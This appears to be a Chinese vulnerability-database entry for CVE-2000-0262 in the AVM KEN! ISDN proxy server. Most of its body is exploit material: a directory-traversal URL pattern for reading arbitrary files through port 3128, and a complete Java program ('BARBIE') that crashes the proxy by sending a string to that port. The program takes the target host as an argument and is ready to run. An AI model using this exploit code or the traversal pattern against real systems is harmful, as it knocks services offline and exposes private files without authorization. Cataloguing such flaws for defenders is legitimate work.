AVM KEN! 1.3.10目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105779 漏洞类型 输入验证
发布时间 2000-04-12 更新时间 2005-05-02
CVE编号 CVE-2000-0262 CNNVD-ID CNNVD-200004-025
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19843
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200004-025
|漏洞详情
AVMKEN!ISDN代理服务器存在漏洞,远程攻击者可以通过异常请求触发拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/1103/info

A remote user on the local network is capable of retrieving any known file from a machine running AVM KEN!. This is accomplished by appending ../ to a URL utilizing port 3128 to escape the regular web file structure, and appending the remaining path onto the request.
eg.
http://target:3128/../../../filename.ext

A denial of service attack could also be launched against AVM KEN! by sending random characters to port 3128. A restart would be required in order to regain normal functionality. 

import java.net.Socket;
import java.io.*;

/*
BARBIE - The AVM KEN! exploit

This exploit causes a crash in the AVM KEN! ISDN Proxy software.
All conections will be cut off, but the server will restart again, 
a few seconds later.

Tested with AVM KEN! Version 1.03.10 (german)
*/

class barbie {

String adress;

public void killken() { 
PrintWriter out = null;
try{
    Socket connection = new Socket( adress, 3128);
    System.out.println("");
    System.out.println("killing..."); 
    out  = new PrintWriter(connection.getOutputStream(), true);
    out.println("Whooopppss_Ken_died");
    connection.close();
   }
catch (IOException e)
{
System.out.println("");
System.out.println(" Can't met Ken! ");
}  
}


public static void main (String arguments[]) {
barbie kk = new barbie();
if(arguments.length < 1)
{
System.out.println("");
System.out.println("usage: java barbie <adress/ip>");
System.exit(1);
}
kk.adress = arguments[0];
kk.killken();
}

}
|参考资料

来源:BUGTRAQ
名称:20000418AVM'sStatement
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg=383085010.956159226625.JavaMail.root@web305-mc.mail.com
来源:BID
名称:1103
链接:http://www.securityfocus.com/bid/1103
来源:BUGTRAQ
名称:20000415(nosubject)
链接:http://archives.neohapsis.com/archives/bugtraq/2000-04/0073.html